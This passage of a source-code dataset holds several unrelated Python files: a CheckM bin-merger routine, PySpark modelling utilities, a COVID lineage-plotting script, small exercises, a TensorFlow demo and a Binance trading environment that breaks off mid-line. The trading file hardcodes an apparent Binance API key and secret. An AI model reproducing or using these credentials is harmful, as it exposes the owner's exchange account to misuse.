binIdJ in binIdToBinMarkerSets:\n if markerGenesI != binIdToBinMarkerSets[binIdJ].mostSpecificMarkerSet().getMarkerGenes():\n self.logger.error(' [Error] All bins must use the same marker set to assess potential mergers.')\n sys.exit(0)\n\n # parse HMM information\n resultsParser = ResultsParser(binIdToModels)\n\n # get HMM hits to each bin\n resultsParser.parseBinHits(outDir, hmmTableFile)\n\n # determine union and intersection of marker sets for each pair of bins\n outputFile = os.path.join(outDir, \"merger.tsv\")\n fout = open(outputFile, 'w')\n fout.write('Bin Id 1\\tBin Id 2')\n fout.write('\\tBin 1 completeness\\tBin 1 contamination')\n fout.write('\\tBin 2 completeness\\tBin 2 contamination')\n fout.write('\\tDelta completeness\\tDelta contamination\\tMerger delta')\n fout.write('\\tMerged completeness\\tMerged contamination\\n')\n\n binMarkerHits = resultsParser.results\n binIds = sorted(binMarkerHits.keys())\n for i in range(0, len(binMarkerHits)):\n binIdI = binIds[i]\n\n geneCountsI = binMarkerHits[binIdI].geneCounts(binIdToBinMarkerSets[binIdI].mostSpecificMarkerSet(), binMarkerHits[binIdI].markerHits, True)\n completenessI, contaminationI = geneCountsI[6:8]\n\n for j in range(i + 1, len(binMarkerHits)):\n binIdJ = binIds[j]\n\n geneCountsJ = binMarkerHits[binIdJ].geneCounts(binIdToBinMarkerSets[binIdJ].mostSpecificMarkerSet(), binMarkerHits[binIdJ].markerHits, True)\n completenessJ, contaminationJ = geneCountsJ[6:8]\n\n # merge together hits from both bins and calculate completeness and contamination\n mergedHits = {}\n for markerId, hits in binMarkerHits[binIdI].markerHits.items():\n mergedHits[markerId] = list(hits)\n\n for markerId, hits in binMarkerHits[binIdJ].markerHits.items():\n if markerId in mergedHits:\n mergedHits[markerId].extend(hits)\n else:\n mergedHits[markerId] = hits\n\n geneCountsMerged = binMarkerHits[binIdI].geneCounts(binIdToBinMarkerSets[binIdJ].mostSpecificMarkerSet(), mergedHits, True)\n completenessMerged, contaminationMerged = geneCountsMerged[6:8]\n\n if not (completenessMerged >= minMergedComp and 
contaminationMerged < maxMergedCont):\n continue\n\n # calculate merged statistics\n deltaComp = completenessMerged - max(completenessI, completenessJ)\n deltaCont = contaminationMerged - max(contaminationI, contaminationJ)\n delta = deltaComp - deltaCont\n\n if deltaComp >= minDeltaComp and deltaCont < maxDeltaCont:\n fout.write('%s\\t%s\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\n' %\n (binIdI, binIdJ,\n completenessI, contaminationI,\n completenessJ, contaminationJ,\n deltaComp, deltaCont, delta,\n completenessMerged, contaminationMerged))\n\n fout.close()\n\n return outputFile\n","repo_name":"jtamames/SqueezeMeta","sub_path":"lib/checkm/merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"61"} +{"seq_id":"15426613595","text":"from typing import List\n\nimport pyspark.sql.functions as f\nfrom pyspark.ml.feature import StringIndexerModel\nfrom pyspark.sql.types import FloatType\nfrom pyspark.ml.param import Param, Params, TypeConverters\nfrom pyspark.sql.functions import col, lit\nfrom pyspark.sql import DataFrame\nimport functools\nimport itertools\nimport time\nimport datetime\nimport boto3\nimport re\nimport pandas as pd\n\n\ndef get_config_param():\n # Now just hard coded. Could be imported from a JSON config file.\n return {\n \"treatments\": {\"aap_num_days\": 7, \"ada_num_days\": 7},\n \"imp_threshold\": 5,\n \"weight\": True,\n }\n\n\ndef get_ols_default_model_artifact():\n return {\n \"gnuA_coeff\": None,\n \"gnuB_coeff\": None,\n \"robust_cov\": None,\n \"V_mat\": None,\n \"features_idx_map\": None,\n }\n\n\ndef get_second_element():\n return f.udf(lambda v: float(v[1]), FloatType())\n\n\ndef log_decorator(func):\n # A very simple logging decorator to track steps. 
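The merge test above keeps a bin pair when completeness rises by at least minDeltaComp while contamination rises by less than maxDeltaCont. The arithmetic, isolated (the numbers below are illustrative, not CheckM output):

def merge_delta(comp_i, cont_i, comp_j, cont_j, comp_merged, cont_merged):
    # Deltas are measured against the better of the two input bins.
    delta_comp = comp_merged - max(comp_i, comp_j)
    delta_cont = cont_merged - max(cont_i, cont_j)
    return delta_comp, delta_cont, delta_comp - delta_cont

# Two half-complete bins that merge into one nearly complete bin:
print(merge_delta(55.0, 1.0, 48.0, 2.0, 96.0, 3.0))  # (41.0, 1.0, 40.0)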
Can be replaced by prod logger.\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n start_time = time.time()\n print(f\"[{datetime.datetime.now().ctime()}] Starting the step {func.__qualname__!r}...\")\n result = func(*args, **kwargs)\n end_time = time.time()\n run_time = end_time - start_time\n print(\n f\"[{datetime.datetime.now().ctime()}] Step {func.__qualname__!r} is finished in {run_time:.2f} seconds.\"\n )\n return result\n\n return wrapper\n\n\ndef set_columns_to_zero(df, zero_features):\n # Set the specified columns to zero in the DataFrame\n for feature, value in zero_features.items():\n df = df.withColumn(feature, f.lit(value))\n return df\n\n\ndef flatten_dict(d):\n \"\"\"Flatten a nested dictionary.\"\"\"\n\n def expand(key, value):\n if isinstance(value, dict):\n return [(key + \" \" + k, v) for k, v in flatten_dict(value).items()]\n else:\n return [(key, value)]\n\n items = [item for k, v in d.items() for item in expand(k, v)]\n return dict(items)\n\n\ndef read_json_from_s3(s3_path):\n # Read json file in S3 as pandas dataframe\n uri_header, bucket_name, prefix = parse_uri(s3_path)\n s3 = boto3.resource(\"s3\")\n json_obj = s3.Bucket(bucket_name).Object(prefix).get()[\"Body\"].read().decode(\"utf-8\")\n json_df = pd.read_json(json_obj, lines=True)\n return json_df\n\n\ndef dataframe_reader(path, spark_session):\n # Flexible dataframe reader\n supported_format_list = [\"csv\", \"parquet\", \"json\"]\n uri_header, bucket_name, prefix = parse_uri(path)\n s3_file_iterator = get_s3_file_iterator(path, spark_session)\n # Figure out the data format and get the first single file name\n supported_format_found = False\n while not supported_format_found and s3_file_iterator.hasNext():\n file_rawpath = s3_file_iterator.next().getPath().toUri().getRawPath()\n file_format_check = [file_rawpath.endswith(x) for x in supported_format_list]\n supported_format_found = any(file_format_check)\n single_file_path = f\"{uri_header}{bucket_name}/{file_rawpath}\"\n file_format = list(itertools.compress(supported_format_list, file_format_check))[0]\n # Get number of executors\n n_executors = spark_session.sparkContext.defaultParallelism\n min_partition = n_executors * 2\n # Call spark dataframe reader for respective formats with single file schema inference.\n if file_format == \"csv\":\n small_data = spark_session.read.csv(single_file_path, header=True)\n data_schema = small_data.schema\n df = spark_session.read.csv(path, schema=data_schema, header=True)\n elif file_format == \"json\":\n small_data = spark_session.read.option(\"multiline\", \"true\").json(single_file_path)\n data_schema = small_data.schema\n df = spark_session.read.json(path, schema=data_schema)\n elif file_format == \"parquet\":\n small_data = spark_session.read.parquet(single_file_path)\n data_schema = small_data.schema\n df = spark_session.read.parquet(path, schema=data_schema)\n else:\n raise \"Unsupported file format!\"\n # Ensure the number of partition is at least min_partition\n if df.rdd.getNumPartitions() < min_partition:\n df = df.repartition(min_partition)\n return df\n\n\ndef get_s3_file_iterator(path, spark_session):\n sc = spark_session.sparkContext\n stripped_path = re.sub(\"/\\*.*\", \"\", path)\n java_path = sc._jvm.java.net.URI.create(stripped_path)\n hadoop_path = sc._jvm.org.apache.hadoop.fs.Path(stripped_path)\n hadoop_fs = sc._jvm.org.apache.hadoop.fs.FileSystem.get(\n java_path, sc._jvm.org.apache.hadoop.conf.Configuration()\n )\n s3_file_iterator = hadoop_fs.listFiles(hadoop_path, True)\n return 
s3_file_iterator\n\n\ndef parse_uri(path):\n uri_header = re.findall(\".*//\", path)[0]\n bucket_name = re.sub(uri_header, \"\", path).split(\"/\")[0]\n prefix = re.sub(f\"{uri_header}{bucket_name}/\", \"\", path)\n return uri_header, bucket_name, prefix\n\n\ndef split_train_test(dataset: DataFrame, rate=0.1):\n train, test = dataset.randomSplit([1 - rate, rate], seed=12345)\n return train, test\n\n\ndef balanced_split_train_test(\n dataset: DataFrame, label_col: str, rate=0.2\n) -> (DataFrame, DataFrame):\n \"\"\"\n Split the dataset into train and test sets with a balanced representation of classes.\n\n Parameters:\n - dataset: The input DataFrame.\n - label_col: The column name of the label.\n - rate: The proportion of the dataset to include in the test split.\n\n Returns:\n - train: The training set.\n - test: The test set.\n \"\"\"\n\n # Get distinct classes\n classes = dataset.select(label_col).distinct().rdd.flatMap(lambda x: x).collect()\n\n train_dfs = []\n test_dfs = []\n\n for class_val in classes:\n # Filter dataset for each class\n class_dataset = dataset.filter(f.col(label_col) == class_val)\n\n # Split the class dataset into train and test\n class_train, class_test = class_dataset.randomSplit([1 - rate, rate])\n\n # Append to the list of train and test dataframes\n train_dfs.append(class_train)\n test_dfs.append(class_test)\n\n # Union all the train and test dataframes\n train = functools.reduce(DataFrame.unionByName, train_dfs)\n test = functools.reduce(DataFrame.unionByName, test_dfs)\n return train, test\n\n\ndef filter_by_range(dataset, col_to_filter, lower_bound=0.05, upper_bound=0.95):\n \"\"\"\n Filter rows based on values in a column not being within a specified range.\n\n Args:\n dataset: The input DataFrame.\n col_to_filter: The column to check values.\n lower_bound: The lower bound of the range.\n upper_bound: The upper bound of the range.\n\n Returns:\n DataFrame with rows filtered.\n \"\"\"\n return dataset.filter((col(col_to_filter) >= lower_bound) & (col(col_to_filter) <= upper_bound))\n\n\ndef truncate_propensity_scores(\n dataset: DataFrame, labels: List[str], lower_bound=0.01, upper_bound=0.99\n):\n \"\"\"\n Truncate propensity scores for the labels based on provided bounds.\n\n Parameters:\n dataset: dataframe to conduct the truncation on.\n labels: List of columns to perform truncation on.\n lower_bound: The lowest allowable bound.\n upper_bound: The highest allowable bound.\n\n\n Returns:\n filtered DataFrames.\n \"\"\"\n combined_filter = generate_combined_filter(labels, lower_bound, upper_bound)\n dataset = dataset.filter(combined_filter)\n\n return dataset\n\n\ndef generate_combined_filter(labels: List[str], lower_bound=0.01, upper_bound=0.99) -> str:\n \"\"\"\n Generate a combined filter expression for multiple labels based on provided bounds.\n\n Parameters:\n labels: List of labels.\n lower_bound: The lowest allowable bound.\n upper_bound: The highest allowable bound.\n\n Returns:\n Combined filter expression string.\n \"\"\"\n filters = [\n f\"({treatment}_propensity_probability BETWEEN {lower_bound} AND {upper_bound})\"\n for treatment in labels\n ]\n combined_filter = \" AND \".join(filters)\n\n return combined_filter\n\n\ndef winsorize_column(dataset, col_name, lower_quantile=0.01, upper_quantile=0.99):\n # Calculate the quantiles\n lower_bound, upper_bound = dataset.approxQuantile(\n col_name, [lower_quantile, upper_quantile], 0.01\n )\n # Winsorize the column\n dataset = dataset.withColumn(\n col_name,\n f.when(f.col(col_name) < lower_bound, 
lower_bound)\n .when(f.col(col_name) > upper_bound, upper_bound)\n .otherwise(f.col(col_name)),\n )\n return dataset\n\n\ndef cap_values_below_zero(dataset, col_name, lower_cap=0):\n return dataset.withColumn(\n col_name, f.when(f.col(col_name) < lower_cap, lower_cap).otherwise(f.col(col_name))\n )\n\n\ndef set_columns_to_zeros(dataset, columns):\n select_expr = [\n lit(0).alias(col_name) if col_name in columns else col_name for col_name in dataset.columns\n ]\n return dataset.select(*select_expr)\n\n\ndef generate_paths(base, *path_components):\n \"\"\"Generate model paths.\"\"\"\n return f\"{base}/{'/'.join(path_components)}/\"\n\n\ndef get_string_indexer_labels(pipeline_model):\n \"\"\"\n Retrieves the labels (categories) used by the stage of the given pipeline if it's a StringIndexerModel.\n Parameters:\n pipeline_model : pyspark.ml.PipelineModel\n The pipeline model from which the labels are to be extracted.\n\n Returns:\n List of labels (categories) used by the StringIndexerModel.\n \"\"\"\n stage = pipeline_model.stages[-2]\n\n if isinstance(stage, StringIndexerModel):\n return stage.labels\n else:\n raise ValueError(\"Expected stage to be a StringIndexerModel, but found a different type.\")\n\n\nclass HasConfigParam(Params):\n # This is the parameter name\n configParam = Param(Params._dummy(), \"configParam\", \"model training configuration parameters\")\n\n def __init__(self):\n super(HasConfigParam, self).__init__()\n self.config_data = get_config_param()\n self._setDefault(\n configParam=\"defaultConfig\"\n ) # Here, \"defaultConfig\" is just a string key/name\n\n @property\n def getConfigParam(self):\n return self.config_data\n\n @property\n def getTreatments(self):\n treatments = self.getConfigParam[\"treatments\"]\n ada = self._get_treatment_key(treatments, \"ada\")\n aap = self._get_treatment_key(treatments, \"aap\")\n\n if not ada or not aap:\n raise ValueError(\"Required treatments not found in the configuration.\")\n\n # Construct the treatment keys\n treatment_ada = f\"{ada}_in_imp_{treatments['ada_num_days']}\"\n treatment_aap = f\"{aap}_in_imp_{treatments['aap_num_days']}\"\n\n return treatment_ada, treatment_aap\n\n @staticmethod\n def _get_treatment_key(treatments, substring):\n \"\"\"\n Fetch the first key containing the specified substring.\n Returns None if no matching key is found.\n \"\"\"\n for treatment in treatments.keys():\n if substring in treatment:\n return treatment\n return None\n\n\nclass HasThreshold(Params):\n threshold = Param(\n Params._dummy(),\n \"threshold\",\n \"vector of threshold values(or a scalar) for constructing indicator variables\",\n )\n\n def __init__(self):\n super(HasThreshold, self).__init__()\n self._setDefault(threshold=0)\n\n def getThreshold(self):\n return self.getOrDefault(self.threshold)\n\n\nclass HasNmFeaturesCol(Params):\n # Utility mixin class for model param\n nmFeaturesCol = Param(\n Params._dummy(),\n \"nmFeaturesCol\",\n \"No marketing features column name.\",\n typeConverter=TypeConverters.toString,\n )\n\n def __init__(self):\n super(HasNmFeaturesCol, self).__init__()\n self._setDefault(nmFeaturesCol=\"nm_features\")\n\n def getNmFeaturesCol(self):\n return self.getOrDefault(self.nmFeaturesCol)\n\n\nclass HasModelArtifact(Params):\n # Utility mixin class for model param\n modelArtifact = Param(\n Params._dummy(),\n \"modelArtifact\",\n \"model artifacts from training that are required for the scoring stage\",\n )\n\n def __init__(self) -> None:\n super(HasModelArtifact, self).__init__()\n 
self._setDefault(modelArtifact=get_ols_default_model_artifact())\n\n def getModelArtifact(self):\n return self.getOrDefault(self.modelArtifact)\n\n\ndef hasColumn(df, colname):\n return colname in df.columns\n","repo_name":"arminfar1/dre","sub_path":"utilities/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761449544","text":"'''embers-style analysis/plotting based only on names of sequences'''\nfrom collections import Counter\nimport argparse\nimport re\nimport datetime\n\nimport covid\nfrom verbose import verbose as v\nimport embersutil as emu\nimport lineagetable\nimport owid\n\nOTHER = lineagetable.OTHER\nEMPTY_LINEAGE_REGEX = re.compile(r'EPI_ISL_\\d+\\.\\s*$')\nDEFAULTNAMESFILE=\"Latest-names.nm\"\n\ndef _getargs():\n ap = argparse.ArgumentParser(description=__doc__,\n conflict_handler='resolve')\n covid.corona_args(ap)\n ap.set_defaults(input=covid.default_seqfile(DEFAULTNAMESFILE))\n emu.embers_args(ap)\n paa = ap.add_argument\n paa(\"--lineagetable\",\"-l\",\n help=\"read lineage table from file (or use FROMSEQS)\")\n paa(\"--writeother\",\n help=\"write out the lineages in the 'other' class to this file\")\n paa(\"--skipnone\",action=\"store_true\",\n help=\"sequences labeled 'None' are totally ignored, not put in OTHER\")\n paa(\"--skipother\",action=\"store_true\",\n help=\"skip all sequences in OTHER category\")\n paa(\"--cases\",#default=\"data/owid-harmonized.csv\",\n help=\"csv file with case counts (harmonized, from OWID)\")\n paa(\"--verbose\",\"-v\",action=\"count\",default=0,\n help=\"verbosity\")\n args = ap.parse_args()\n return args\n\n\ndef print_other_lineages(filename,other_lineages):\n '''if other lineages found, print out a summary'''\n if not filename:\n return\n otherlist = sorted(other_lineages,key=other_lineages.get,reverse=True)\n with open(filename,'w') as fout:\n for lin in otherlist:\n print(\"%6d %s\" % (other_lineages[lin],lin),file=fout)\n\ndef main(args):\n '''sparks main'''\n v.vprint(args)\n\n seqs = covid.read_seqfile(args)\n seqs = covid.filter_seqs_by_pattern(seqs,args,keepfirst=False)\n seqs = emu.filter_seqs_by_padded_dates(seqs,args)\n v.vvprint(args)\n\n if args.lineagetable and args.lineagetable.upper() == \"FROMSEQS\":\n ## special case in which lineage table is \"created on the fly\"\n ## with the most common pango lineages (with no grouping of\n ## similar lineages as is done inthe lineage table files)\n seqs = list(seqs)\n T = lineagetable.get_lineage_table_from_seqs(seqs,\n num_lineages=24,\n skipnone=args.skipnone)\n else:\n ## build lineage table from the file\n T = lineagetable.get_lineage_table(args.lineagetable)\n\n v.vvprint('patterns',T.patterns)\n v.vvprint('names',list(T.names.values()))\n\n date_counter = {m: Counter() for m in T.patterns}\n other_lineages = Counter()\n for s in seqs:\n\n seqdate = emu.date_from_seqname(s.name)\n if not seqdate:\n v.vprint_only(5,\"No seqdate:\",s.name)\n continue\n\n if (seqdate.year,seqdate.month) < (2019,11):\n v.vprint_only(5,\"Bad seqdate:\",seqdate,s.name)\n continue\n\n lineage = covid.get_lineage_from_name(s.name)\n\n if args.skipnone:\n if lineage in [\"None\",\"Unassigned\",\"\"]:\n v.vprint_only(5,\"skip None:\",f'[{s.name}]')\n continue\n\n voc = T.last_match(\".\"+lineage)\n\n if voc == OTHER:\n if args.writeother:\n other_lineages[lineage] += 1\n v.vvprint_only(10,'Other:',s.name)\n if args.skipother:\n v.vprint_only(5,\"skip 
other:\",voc,s.name)\n continue\n\n date_counter[voc][seqdate] += 1\n\n v.vprint_only_summary(\"No seqdate:\",\"warnings triggered\")\n v.vprint_only_summary(\"Bad seqdate:\",\"warnings triggered\")\n v.vprint_only_summary(\"Other:\",\"sequences in OTHER category\")\n v.vprint_only_summary(\"skip None:\",\"sequences skipped\")\n v.vprint_only_summary(\"skip other:\",\"sequences skipped\")\n\n v.vprint('Other lineages:',sum(other_lineages.values()))\n v.vprint('OTHER lineages:',sum(date_counter[OTHER].values()))\n\n print_other_lineages(args.writeother,other_lineages)\n\n nmatches = sum(sum(date_counter[p].values()) for p in T.patterns)\n v.vprint(\"matched sequences:\",nmatches)\n if nmatches==0:\n ifilters = \" \".join(args.filterbyname) if args.filterbyname else \"Global\"\n xfilters = \" w/o \" + \" \".join(args.xfilterbyname) if args.xfilterbyname else \"\"\n raise RuntimeError(f\"No sequences for: {ifilters}{xfilters}\")\n\n onsets=dict()\n if args.onsets:\n ## Don't include OTHER or T.patterns that don't appear in sequence set\n onsets.update( {m: min(date_counter[m])\n for m in T.patterns\n if date_counter[m] and m != OTHER} )\n\n for line in emu.mk_counts_table(date_counter,T.names):\n v.vprint(line)\n\n ord_range, ord_plot_range = emu.get_ord_daterange(date_counter,args.dates)\n v.vprint(\"ordinal range:\",ord_range,ord_plot_range)\n v.vprint(\"ordinal to date:\",args.dates,\n datetime.date.fromordinal(ord_range[0]),\n datetime.date.fromordinal(ord_range[1]))\n cum_counts = emu.get_cumulative_counts(date_counter,ord_range,\n daysperweek=args.daily)\n\n num_cases=None\n ncases=0\n if args.cases:\n df = owid.read_dataframe(args.cases)\n if df is None:\n raise RuntimeError(f'Cannot read OWID datafile: {args.cases}')\n df = owid.filter_cases(df,args.filterbyname,args.xfilterbyname)\n num_cases,ncases = owid.case_counts(df,ord_plot_range,\n daysperweek=args.daily)\n if max(num_cases) == 0:\n v.vprint(f\"No OWID case data for {args.filterbyname}\")\n num_cases = None\n\n if args.skipother:\n del cum_counts[OTHER]\n T.del_pattern(OTHER)\n\n if args.skipnone:\n for nonestring in ['None','Unssigned',\n '(None|Unassigned)',\n '(None|Unassigned|)']:\n try:\n del cum_counts[nonestring]\n T.del_pattern(nonestring)\n v.vvprint('Removing:',nonestring)\n except:\n v.vvprint('Cannot remove:',nonestring)\n\n emu.make_emberstyle_plots(args,'bynames',cum_counts,\n T.names,T.colors,ord_range[0],\n ordplotrange = ord_plot_range,\n num_cases = num_cases,\n title=covid.get_title(args),\n nmatches=nmatches,\n ncases=ncases,\n daily=args.daily,\n onsets=onsets)\n\nif __name__ == \"__main__\":\n\n _args = _getargs()\n v.verbosity(_args.verbose)\n main(_args)\n","repo_name":"jt-lanl/cov-voc","sub_path":"sparks.py","file_name":"sparks.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"4855225572","text":"if __name__ == '__main__':\n while True:\n # get input to coordinate, init flag\n num_list = list(map(int, input().split(' ')))\n begin_coordinate, over_coordinate = num_list[:2], num_list[2:]\n yes_queen_can_flag = False\n\n # if any 0 in num_list -> break\n if 0 in num_list:\n break\n\n # check same row and column\n if begin_coordinate[0] == over_coordinate[0] or begin_coordinate[1] == over_coordinate[1]:\n yes_queen_can_flag = True\n # check bottom left to top right\n elif begin_coordinate[1] - begin_coordinate[0] == over_coordinate[1] - over_coordinate[0]:\n yes_queen_can_flag = True\n # check bottom 
right to top left\n        elif begin_coordinate[1] + begin_coordinate[0] == over_coordinate[1] + over_coordinate[0]:\n            yes_queen_can_flag = True\n\n        # print\n        if yes_queen_can_flag:\n            print('True')\n        else:\n            print('False')","repo_name":"110621013/algorithm","sub_path":"hw/HW6_0504/Queen.py","file_name":"Queen.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32041414666","text":"mahasiswa1 = {\n    'nim' : 202145,\n    'nama' : 'fauzi',\n    'alamat' :'sumbawa' ,\n\n}\nmahasiswa2 = {\n    'nim' :[ 202146, 335, 442 ],\n    'nama':['Digo','Sobri', 'devan'],\n    'alamat':['sumbawa','lombok','sumbawa']\n\n}\n# update the data with a 'harga' (price) field\nbarang = [mahasiswa1, mahasiswa2]\nprint(barang)\nbarang[0]['harga'] = 17500\nbarang[1]['harga'] = 17500\nprint(barang)\n# append a fourth entry\nmahasiswa2['nim'].append(333)\nmahasiswa2['nama'].append('budi')\nmahasiswa2['alamat'].append('kediri')\nprint(mahasiswa2)\n\n\n","repo_name":"abusobri007/python_zth_trainer","sub_path":"Tugas dan latihan/latihan13.py","file_name":"latihan13.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39865893118","text":"# Write a program that asks for two numbers and prints the larger one.\r\n\r\nnumero_1 = float(input(\"Enter the first number: \"))\r\nnumero_2 = float(input(\"Enter the second number: \"))\r\n\r\nif numero_1 > numero_2:\r\n    print(\"The larger number is\", numero_1)\r\nelif numero_1 == numero_2:\r\n    print(\"The numbers are equal\")\r\nelse:\r\n    print(\"The larger number is\", numero_2)","repo_name":"jessemcastro/respostas_estrutura_de_decisao","sub_path":"01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1583098871","text":"import tensorflow as tf\n\n\ndef simple_math():\n    # Let's do simple Python first\n    a = 1\n    b = 2\n    c = a + b\n    print(\"c = a(1) + b(2) =\", c)\n\n    # Let's try with tensorflow constants now\n    a = tf.constant(1)\n    b = tf.constant(2)\n    c = a + b\n    print(\"c = a(1) + b(2) =\", c)\n\n    # In order to get a value out of tensorflow, we must \"run\" the tensors in a\n    # session\n    with tf.Session() as session:\n        result = session.run(c)\n        print(\"c = a(1) + b(2) =\", result)\n\n\ndef minimize():\n    # y = (x - a) * (x - b) is a \"parabolic function\" with its lowest point in\n    # the middle of 'a' and 'b'\n\n    # Let 'a' and 'b' be placeholders, we will assign values to them later\n    a = tf.placeholder(tf.float32)\n    b = tf.placeholder(tf.float32)\n    x = tf.Variable(0., dtype=tf.float32)\n    y = (x - a) * (x - b)\n\n    train_op = tf.train.AdamOptimizer(0.01).minimize(y)\n\n    with tf.Session() as session:\n        session.run(tf.global_variables_initializer())\n\n        # Let's try for a = 0, b = 4\n        print(\"trying to find the minimum value of 'y' for \"\n              \"'y = (x - 0) * (x - 4)'\")\n        placeholders = {a: 0, b: 4}\n        for _ in range(30):\n            for _ in range(20):\n                session.run(train_op, placeholders)\n            print(session.run((x, y), placeholders))\n\n        # Now let's try for a = 4, b = 8\n        print(\"trying to find the minimum value of 'y' for \"\n              \"'y = (x - 4) * (x - 8)'\")\n        placeholders = {a: 4, b: 8}\n        for _ in range(30):\n            for _ in range(20):\n                session.run(train_op, placeholders)\n            print(session.run((x, y), placeholders))\n\n\ndef main():\n    simple_math()\n    minimize()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"kbairak/codeweek-tensorflow","sub_path":"01_basic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19052989140","text":"#coding:utf-8\n# Write a Python program to combine each line from the first file with the corresponding line in the second file.\nwith open(\"file\",'r') as f:\n    w=f.readlines()\n\nwith open(\"fileCopy\",'r') as f1:\n    w1=f1.readlines()\n\n# zip pairs corresponding lines; the original nested comprehension produced the full cross product\nwith open(\"file2\",'w') as f2:\n    for l1, l2 in zip(w, w1):\n        f2.write(l1.rstrip() + ' ' + l2)","repo_name":"DonaFidele/PythonExercices","sub_path":"file_input_output/exo_14.py","file_name":"exo_14.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41304308679","text":"from binance import Client\nimport pandas as pd\nimport datetime\nimport random\nfrom gym.spaces import Discrete, Box\nimport numpy as np\nfrom collections import deque\nfrom utils import write_to_file\nfrom viz import TradingGraph\nfrom stable_baselines3.common.env_checker import check_env\nfrom gym import Env\nimport os\nfrom stable_baselines3 import PPO\nfrom ta.trend import SMAIndicator, macd, PSARIndicator\nfrom ta.volatility import BollingerBands\nfrom ta.momentum import rsi\n\n\napi_key = \"IkglEvMVJST0OmJA3Jfhi7nGUirfrYRnGsGdBTUoKNkpOPiDmSnfElk3zujUrabT\"\nsecret_key = \"hXOnb96VFSBSfvrHJYAdBv9UGR61CnbpqXZpDhoqGqc0QxbLNI9BdsCZsRrtyou2\"\nclient = Client(api_key, secret_key)\nlog_path = os.path.join('Training', 'Logs')\nsave_path = os.path.join('Training', \"Saved Models\", \"PPO Model Crypto 1\")\n\n\nclass CustomEnv(Env):\n    # A custom Bitcoin trading environment\n    def __init__(self, df, initial_balance=1000, lookback_window_size=120, trading_cycle=480, render_range=100, normalize_value=40000):\n        # Define action space and state size and other custom parameters\n        self.df = df.dropna().reset_index()\n        self.df_total_steps = len(self.df) - 1\n        self.initial_balance = initial_balance\n        self.lookback_window_size = lookback_window_size\n        self.num_of_parameters = 6\n        self.env_steps_size = trading_cycle\n        self.render_range = render_range\n        self.no_of_orders = 0\n        self.order_placed_now = False\n        self.punish_value = 0\n        self.total_reward = 0\n        self.normalize_value = normalize_value\n\n        # Action space from 0 to 2: 0 is hold, 1 is buy, 2 is sell\n        self.action_space = Discrete(3)\n        self.observation_space = Box(low=0, high=100000, shape=(lookback_window_size, self.num_of_parameters))\n        self.state = deque(maxlen=self.lookback_window_size)\n        self.state_size = (self.lookback_window_size, self.num_of_parameters)\n\n    def reset(self, mode=\"training\"):\n        self.balance = self.initial_balance\n        self.net_worth = self.initial_balance\n        self.prev_net_worth = self.initial_balance\n        self.crypto_held = 0\n        self.crypto_sold = 0\n        self.crypto_bought = 0\n        self.no_of_orders = 0\n        self.punish_value = 0\n\n        print(self.total_reward)\n        self.total_reward = 0\n        if mode == \"training\":\n            self.start_step = random.randint(self.lookback_window_size, self.df_total_steps - self.env_steps_size)\n            self.end_step = self.start_step + self.env_steps_size\n        else:\n            self.start_step = self.lookback_window_size\n            self.end_step = self.df_total_steps\n        self.current_step = self.start_step\n        for i in reversed(range(self.lookback_window_size)):\n            current_step = self.current_step - i\n            self.state.append([self.df.loc[current_step, 'Open'],\n                               
self.df.loc[current_step, 'High'],\n self.df.loc[current_step, 'Low'],\n self.df.loc[current_step, 'Close'],\n self.df.loc[current_step, 'Volume'],\n self.balance\n ])\n\n self.visualization = TradingGraph(Render_range=self.render_range) # init visualization\n self.trades = deque(maxlen=self.render_range)\n\n return np.array(self.state)\n\n\n # Execute one time step within the environment\n def step(self, action):\n self.crypto_bought = 0\n self.crypto_sold = 0\n self.current_step += 1\n time = self.df.loc[self.current_step, 'Time'] # for visualization\n high = self.df.loc[self.current_step, 'High'] # for visualization\n low = self.df.loc[self.current_step, 'Low'] # for visualization\n\n current_price = self.df.loc[self.current_step, 'Close']\n self.order_placed_now = False\n if action == 0: # Hold\n pass\n elif action == 1 and self.balance > self.initial_balance/100:\n # Buy with 100% of current balance\n self.crypto_bought = self.balance / current_price\n self.balance -= self.crypto_bought * current_price\n self.crypto_held += self.crypto_bought\n self.no_of_orders += 1\n self.order_placed_now = True\n self.trades.append({'time' : time, 'High' : high, 'Low' : low, 'total': self.crypto_bought, 'type': \"buy\", \"current_price\": current_price})\n\n elif action == 2 and self.crypto_held > 0:\n # Sell 100% of current crypto held\n self.crypto_sold = self.crypto_held\n self.balance += self.crypto_sold * current_price\n self.crypto_held -= self.crypto_sold\n self.no_of_orders += 1\n self.order_placed_now = True\n self.trades.append({'time' : time, 'High' : high, 'Low' : low, 'total': self.crypto_sold, 'type': \"sell\", \"current_price\": current_price})\n\n self.prev_net_worth = self.net_worth\n self.net_worth = self.balance + self.crypto_held * current_price\n\n # Calculate reward\n reward = self.get_reward()\n self.total_reward += reward\n if self.net_worth <= self.initial_balance / 2 or self.current_step >= self.end_step:\n done = True\n else:\n done = False\n\n obs = self._next_observation()\n\n return obs, reward, done, {}\n\n # Get the data points for the given current_step\n def _next_observation(self):\n self.state.append([self.df.loc[self.current_step, 'Open'],\n self.df.loc[self.current_step, 'High'],\n self.df.loc[self.current_step, 'Low'],\n self.df.loc[self.current_step, 'Close'],\n self.df.loc[self.current_step, 